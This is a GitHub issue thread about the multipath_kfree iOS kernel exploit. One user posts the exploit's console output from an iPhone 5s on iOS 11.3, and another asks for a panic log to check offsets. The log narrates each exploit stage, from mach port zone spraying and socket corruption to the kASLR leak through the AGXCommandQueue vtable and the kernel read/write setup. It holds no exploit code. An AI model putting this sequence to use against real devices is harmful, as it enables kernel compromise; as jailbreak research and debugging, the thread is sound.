Comments (3)

MTJailed avatar MTJailed commented on September 29, 2024

Can you provide the panic log from that time? I think your offset may be incorrect.

from multipath_kfree.

luoei avatar luoei commented on September 29, 2024
           ██╗  ██╗ ██████╗ ██████╗ ██████╗ ███████╗
           ╚██╗██╔╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
            ╚███╔╝ ██║     ██║   ██║██║  ██║█████╗
            ██╔██╗ ██║     ██║   ██║██║  ██║██╔══╝
           ██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝███████╗
           ╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝

Hello there debugger, thanks for debugging me, but I might be unreliable with big brother watching me (kernel panics).

Debug server process id: 356 group process id: 357
Stage 1: Exploiting the kernel.
offsets selected for iOS 11.3 or above
build_id: 15E302
sysname: Darwin
nodename: Luoei-5s
release: 17.5.0
version: Darwin Kernel Version 17.5.0: Tue Mar 13 21:32:12 PDT 2018; root:xnu-4570.52.2~8/RELEASE_ARM64_S5L8960X
machine: iPhone6,2
Your device isn't supported yet, find your offsets and add them to offsets.m in the project.
Initializing multipath_kfree bug...
Filling the zone with 10,000 machports...
Filling the zone with another 0x20 machports serving as our first port for corruption...
Creating our first socket...
Our first socket descriptor is: 3
Filling our the zone and our first port array with the remaining 68 ports...
Creating the rest of our 15 sockets...
Initializing empty messages for all of our potential first ports...
Freeing first and second in our socket struct and praying that we are still here...
Finding corrupt port in that zone so we can leak the kernel ASLR shift later...
Port 0x26d603 is corrupt!
Corrupt port: 0026D603 31
Filling ports to serve as a zone spray for finding the kASLR slide and getting r/w...
Initializing empty messages for all of our sprayed ports...
Receiving the response message from our corrupt port, leaking the address of our new contained port...
Refill port is at 0xfffffff1136c07a0
Sending an empty message to our corrupted port...
Freeing the contained port using multipath bug...
Port 0x26d603 is corrupt!
Leaking kASLR by filling the zone with userclients to AGXCommandQueue...
Receiving back from our corrupt port, leaking the address of the userclient...
Calculating the address of the vtable of AGXCommandQueue from the leaked userclient...
AGXCommandQueue vtable is at: 0xfffffff00b48d8c0
Calculating kaslr_shift, if this displays 0xffff(something) then check if the vtable offset is correct!
kaslr shift: 0xfffffff00b48d8c0
Destroying the corrupted port as we now have the kASLR slide...
Filling the zone again with some random ports so we can get kernel read write...
Setting up kernel r/w access using s1guza's gadgets...

from multipath_kfree.

luoei avatar luoei commented on September 29, 2024

@MTJailed

from multipath_kfree.